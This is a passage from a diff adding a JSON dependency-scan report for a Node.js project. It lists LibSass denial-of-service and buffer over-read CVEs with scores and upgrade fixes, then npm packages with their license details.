"date": "2018-11-28", + "message": "Update utfcpp to v2.3.6\n\nFixes #2657\n\nIncorporates the following utfcpp patches:\n\n1. Sass addition of `retreat`.\n https://github.com/nemtrif/utfcpp/pull/20\n\n2. Fix for `replace_invalid` throwing on incomplete sequence at the end\n of the input.\n https://github.com/nemtrif/utfcpp/pull/21" + } + ], + "sourceFiles": [ + { + "name": "checked.h", + "sha1": "b52ccc543e3940f4e98f263dafbccf2fab8d2a37", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/utf8/checked.h", + "id": 2707366 + } + ], + "references": [] + }, + { + "name": "CVE-2018-20190", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-17", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20190", + "description": "In LibSass 3.5.5, a NULL Pointer Dereference in the function Sass::Eval::operator()(Sass::Supports_Operator*) in eval.cpp may cause a Denial of Service (application crash) via a crafted sass input file.", + "topFix": { + "vulnerability": "CVE-2018-20190", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20190", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2018-12-17", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "eval.cpp", + "sha1": "f2af498b634a3fef413a9c560d5213fafc1ec639", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/eval.cpp", + "id": 2707335 + }, + { + "name": "parser.cpp", + "sha1": "83ce8a6dfdf9df13d65dd365dbeca5ac2a8d04b7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.cpp", + "id": 2882382 + }, + { + "name": "parser.hpp", + "sha1": "b728252bf8eeb621142f335def5620e52373b07a", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.hpp", + "id": 2707303 + } + ], + "references": [] + }, + { + "name": "CVE-2018-20821", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2019-04-23", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20821", + "description": "The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp).", + "topFix": { + "vulnerability": "CVE-2018-20821", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20821", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-04-23", + "message": "Upgrade to version" + }, + "allFixes": [ + { + "vulnerability": "CVE-2018-20821", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20821", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-04-23", + "message": "Upgrade to version" + }, + { + "vulnerability": "CVE-2018-20821", + "type": "CHANGE_FILES", + "origin": "GITHUB_COMMIT", + "url": "https://github.com/sass/libsass/commit/f2db04883e5fff4e03777dcc1eb60d4373c45be1", + "fixResolution": "Replace or update the following files: util_string.cpp, util_string.hpp, parser.hpp, parser.cpp", + "date": "2019-04-15", + "message": "Make `parse_css_variable_value` non-recursive\n\nFixes #2658 stack overflow" + } + ], + "sourceFiles": [ + { + "name": "parser.cpp", + "sha1": "83ce8a6dfdf9df13d65dd365dbeca5ac2a8d04b7", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.cpp", + "id": 2882382 + }, + { + "name": "parser.hpp", + "sha1": "b728252bf8eeb621142f335def5620e52373b07a", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/parser.hpp", + "id": 2707303 + } + ], + "references": [] + }, + { + "name": "CVE-2018-20822", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2019-04-23", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20822", + "description": "LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp).", + "topFix": { + "vulnerability": "CVE-2018-20822", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-20822", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-08-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "ast.hpp", + "sha1": "c102b945b60e55510a6aee49d482691b900eab88", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/ast.hpp", + "id": 2707394 + } + ], + "references": [] + }, + { + "name": "CVE-2019-18797", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "publishDate": "2019-11-06", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-18797", + "description": "LibSass 3.6.1 has uncontrolled recursion in Sass::Eval::operator()(Sass::Binary_Expression*) in eval.cpp.", + "topFix": { + "vulnerability": "CVE-2019-18797", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-18797", + "fixResolution": "Upgrade to version 3.6.3", + "date": "2019-11-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "eval.cpp", + "sha1": "f2af498b634a3fef413a9c560d5213fafc1ec639", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/eval.cpp", + "id": 2707335 + } + ], + "references": [] + }, + { + "name": "CVE-2019-6283", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2019-01-14", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6283", + "description": "In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::parenthese_scope in prelexer.hpp.", + "topFix": { + "vulnerability": "CVE-2019-6283", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6284", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-08-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "prelexer.hpp", + "sha1": "12ee2fa341c32e7c399165689c959c462f4df862", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/prelexer.hpp", + "id": 2707336 + } + ], + "references": [] + }, + { + "name": "CVE-2019-6284", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2019-01-14", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6284", + "description": "In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::alternatives in prelexer.hpp.", + "topFix": { + "vulnerability": "CVE-2019-6284", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6284", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-08-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "prelexer.hpp", + "sha1": "12ee2fa341c32e7c399165689c959c462f4df862", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/prelexer.hpp", + "id": 2707336 + } + ], + "references": [] + }, + { + "name": "CVE-2019-6286", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2019-01-14", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6286", + "description": "In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::skip_over_scopes in prelexer.hpp when called from Sass::Parser::parse_import(), a similar issue to CVE-2018-11693.", + "topFix": { + "vulnerability": "CVE-2019-6286", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-6286", + "fixResolution": "Upgrade to version 3.6.0", + "date": "2019-08-06", + "message": "Upgrade to version" + }, + "allFixes": [], + "sourceFiles": [ + { + "name": "prelexer.hpp", + "sha1": "12ee2fa341c32e7c399165689c959c462f4df862", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/prelexer.hpp", + "id": 2707336 + } + ], + "references": [] + } + ], + "customAttributeValues": [] + }, + { + "keyUuid": "aec61e72-58b8-481c-956a-b987c2589754", + "keyId": 27684902, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "homePage": "https://github.com/isaacs/inherits#readme", + "genericPackageIndex": "https://www.npmjs.org/package/inherits" + }, + "matchType": "SHA1", + "sha1": "0fa2c64f932917c3433a0ded55363aae37416b7c", + "name": "inherits-2.0.4.tgz", + "artifactId": "inherits-2.0.4.tgz", + "version": "2.0.4", + "groupId": "inherits", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4d1e237f-a87e-4a98-bc29-f262658eba1a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e71ff5eb-339c-4b4a-9355-65738a21e5f1", + "keyId": 27311323, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/mimic-fn#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mimic-fn" + }, + "matchType": "SHA1", + "sha1": "7ed2c2ccccaf84d3ffcb7a69b57711fc2083401b", + "name": "mimic-fn-2.1.0.tgz", + "artifactId": "mimic-fn-2.1.0.tgz", + "version": "2.1.0", + "groupId": "mimic-fn", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a1782a09-4aea-42b5-8da4-3ac3b3cb67f6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "25d72ae9-01f1-49bf-9679-a1afe909a407", + "keyId": 27679371, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", + "homePage": "https://github.com/calvinmetcalf/process-nextick-args", + "genericPackageIndex": "https://www.npmjs.org/package/process-nextick-args" + }, + "matchType": "SHA1", + "sha1": "7820d9b16120cc55ca9ae7792680ae7dba6d7fe2", + "name": "process-nextick-args-2.0.1.tgz", + "artifactId": "process-nextick-args-2.0.1.tgz", + "version": "2.0.1", + "groupId": "process-nextick-args", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/process-nextick-args/v/2.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "45f76fd0-2334-42a8-a403-d18a28f26376", + "keyId": 27713940, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/winchan/-/winchan-0.2.2.tgz", + "homePage": "https://github.com/auth0/winchan#readme", + "genericPackageIndex": "https://www.npmjs.org/package/winchan" + }, + "matchType": "SHA1", + "sha1": "6766917b88e5e1cb75f455ffc7cc13f51e5c834e", + "name": "winchan-0.2.2.tgz", + "artifactId": "winchan-0.2.2.tgz", + "version": "0.2.2", + "groupId": "winchan", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/winchan/v/0.2.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ef82e7c6-3a0b-4cbd-b0f8-4cc5caaf2584", + "keyId": 27721939, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "homePage": "https://github.com/grncdr/merge-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/merge-stream" + }, + "matchType": "SHA1", + "sha1": "52823629a14dd00c9770fb6ad47dc6310f2c1f60", + "name": "merge-stream-2.0.0.tgz", + "artifactId": "merge-stream-2.0.0.tgz", + "version": "2.0.0", + "groupId": "merge-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/merge-stream" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fcba363d-dcb4-4955-95c0-9bda1de82a4a", + "keyId": 27698369, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/http-errors/-/http-errors-1.7.3.tgz", + "homePage": "https://github.com/jshttp/http-errors#readme", + "genericPackageIndex": "https://www.npmjs.org/package/http-errors" + }, + "matchType": "SHA1", + "sha1": "6c619e4f9c60308c38519498c14fbb10aacebb06", + "name": "http-errors-1.7.3.tgz", + "artifactId": "http-errors-1.7.3.tgz", + "version": "1.7.3", + "groupId": "http-errors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/07b4dbf7-99d9-4973-9068-d7891851c795" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6845f8cc-51a2-4e7a-b554-e227b2cde396", + "keyId": 26955421, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-path-cwd/-/is-path-cwd-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-path-cwd", + "genericPackageIndex": "https://www.npmjs.org/package/is-path-cwd" + }, + "matchType": "SHA1", + "sha1": "d225ec23132e89edd38fda767472e62e65f1106d", + "name": "is-path-cwd-1.0.0.tgz", + "artifactId": "is-path-cwd-1.0.0.tgz", + "version": "1.0.0", + "groupId": "is-path-cwd", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7a867c0a-7d25-426f-aeb3-874111cc7145" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "129ca642-1848-470a-9265-ff98b6373b55", + "keyId": 26957185, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/del/-/del-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/del#readme", + "genericPackageIndex": "https://www.npmjs.org/package/del" + }, + "matchType": "SHA1", + "sha1": "53ecf699ffcbcb39637691ab13baf160819766e5", + "name": "del-3.0.0.tgz", + "artifactId": "del-3.0.0.tgz", + "version": "3.0.0", + "groupId": "del", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/96474fc0-40d5-4d6d-961b-30eefbfa2c96" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8f193dcc-9ce8-4786-8c4d-bbf61fc61402", + "keyId": 26957191, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-path-in-cwd/-/is-path-in-cwd-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/is-path-in-cwd#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-path-in-cwd" + }, + "matchType": "SHA1", + "sha1": "5ac48b345ef675339bd6c7a48a912110b241cf52", + "name": "is-path-in-cwd-1.0.1.tgz", + "artifactId": "is-path-in-cwd-1.0.1.tgz", + "version": "1.0.1", + "groupId": "is-path-in-cwd", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-path-in-cwd/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d1e5879e-a9af-48be-a231-818cd6c15fc0", + "keyId": 26954740, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/is-path-inside#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-path-inside" + }, + "matchType": "SHA1", + "sha1": "8ef5b7de50437a3fdca6b4e865ef7aa55cb48036", + "name": "is-path-inside-1.0.1.tgz", + "artifactId": "is-path-inside-1.0.1.tgz", + "version": "1.0.1", + "groupId": "is-path-inside", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/546d2e48-f179-41f8-9a78-19aeb27a0a33" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2939cb39-5052-414c-82aa-31b8c23e4222", + "keyId": 26965817, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mz/-/mz-2.7.0.tgz", + "homePage": "https://github.com/normalize/mz#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mz" + }, + "matchType": "SHA1", + "sha1": "95008057a56cafadc2bc63dde7f9ff6955948e32", + "name": "mz-2.7.0.tgz", + "artifactId": "mz-2.7.0.tgz", + "version": "2.7.0", + "groupId": "mz", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mz" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4e7dd8b2-1606-498b-98a0-11e5b5349527", + "keyId": 27152826, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-dynamic-import/-/plugin-syntax-dynamic-import-7.2.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-dynamic-import" + }, + "matchType": "SHA1", + "sha1": "69c159ffaf4998122161ad8ebc5e6d1f55df8612", + "name": "plugin-syntax-dynamic-import-7.2.0.tgz", + "artifactId": "plugin-syntax-dynamic-import-7.2.0.tgz", + "version": "7.2.0", + "groupId": "@babel/plugin-syntax-dynamic-import", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d9cc76aa-17e5-49bc-996f-9699c31d6539" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8554ba53-b17f-45f0-ac75-51b396c580a8", + "keyId": 28432205, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-core/-/honeyui-core-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/core#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-core" + }, + "matchType": "SHA1", + "sha1": "5490830273a8d2338952f47f0ce991d8215f8658", + "name": "honeyui-core-1.3.0.tgz", + "artifactId": "honeyui-core-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui-core", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "48969610-1f79-4615-8678-f994338b5bb9", + "keyId": 27557480, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fork-ts-checker-webpack-plugin/-/fork-ts-checker-webpack-plugin-1.3.4.tgz", + "homePage": "https://github.com/Realytics/fork-ts-checker-webpack-plugin#readme", + "genericPackageIndex": "https://www.npmjs.org/package/fork-ts-checker-webpack-plugin" + }, + "matchType": "SHA1", + "sha1": "a75b6fe8d3db0089555f083c4f77372227704244", + "name": "fork-ts-checker-webpack-plugin-1.3.4.tgz", + "artifactId": "fork-ts-checker-webpack-plugin-1.3.4.tgz", + "version": "1.3.4", + "groupId": "fork-ts-checker-webpack-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3a9f3152-d6c9-494d-93ac-1081c5ed63ab" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d6f179dd-8c4b-4b33-a527-edf954c5a406", + "keyId": 26965283, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path/-/path-0.12.7.tgz", + "homePage": "http://nodejs.org/docs/latest/api/path.html", + "genericPackageIndex": "https://www.npmjs.org/package/path" + }, + "matchType": "SHA1", + "sha1": "d4dc2a506c4ce2197eb481ebfcd5b36c0140b10f", + "name": "path-0.12.7.tgz", + "artifactId": "path-0.12.7.tgz", + "version": "0.12.7", + "groupId": "path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6f166f1d-07dc-41c8-a680-43ee5e08d080" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5bd63265-be8f-4776-a59d-9d8a03cbbbf6", + "keyId": 28389777, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ampproject/toolbox-core/-/toolbox-core-1.1.1.tgz", + "homePage": "https://github.com/ampproject/amp-toolbox/tree/master/packages/core", + "genericPackageIndex": "https://www.npmjs.org/package/@ampproject/toolbox-core" + }, + "matchType": "SHA1", + "sha1": "540c8f3ab0f5d1faa1ba35282cd5f5f3f0e16a76", + "name": "toolbox-core-1.1.1.tgz", + "artifactId": "toolbox-core-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@ampproject/toolbox-core", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0ef59046-7544-4d14-9121-210035508d08" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3ef96988-3e79-420f-87f5-fc5a46bca672", + "keyId": 28432140, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/audit-resolve-core/-/audit-resolve-core-1.1.7.tgz", + "homePage": "https://github.com/naugtur/audit-resolve-core#readme", + "genericPackageIndex": "https://www.npmjs.org/package/audit-resolve-core" + }, + "matchType": "SHA1", + "sha1": "2c04141e45b7464b0f683e57f32aa93a6cf218d0", + "name": "audit-resolve-core-1.1.7.tgz", + "artifactId": "audit-resolve-core-1.1.7.tgz", + "version": "1.1.7", + "groupId": "audit-resolve-core", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/audit-resolve-core" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c2aac530-66f4-402c-975e-3389ea9c9f62", + "keyId": 26954791, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bytes/-/bytes-3.0.0.tgz", + "homePage": "https://github.com/visionmedia/bytes.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/bytes" + }, + "matchType": "SHA1", + "sha1": "d32815404d689699f85a4ea4fa8755dd13a96048", + "name": "bytes-3.0.0.tgz", + "artifactId": "bytes-3.0.0.tgz", + "version": "3.0.0", + "groupId": "bytes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d9e3d97e-9cad-4066-808a-7ba58d4f787d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c03ac9b5-4df4-4f9e-b670-148964d0ada7", + "keyId": 27884093, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/webpack-sources/-/webpack-sources-1.4.3.tgz", + "homePage": "https://github.com/webpack/webpack-sources#readme", + "genericPackageIndex": "https://www.npmjs.org/package/webpack-sources" + }, + "matchType": "SHA1", + "sha1": "eedd8ec0b928fbf1cbfe994e22d2d890f330a933", + "name": "webpack-sources-1.4.3.tgz", + "artifactId": "webpack-sources-1.4.3.tgz", + "version": "1.4.3", + "groupId": "webpack-sources", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": 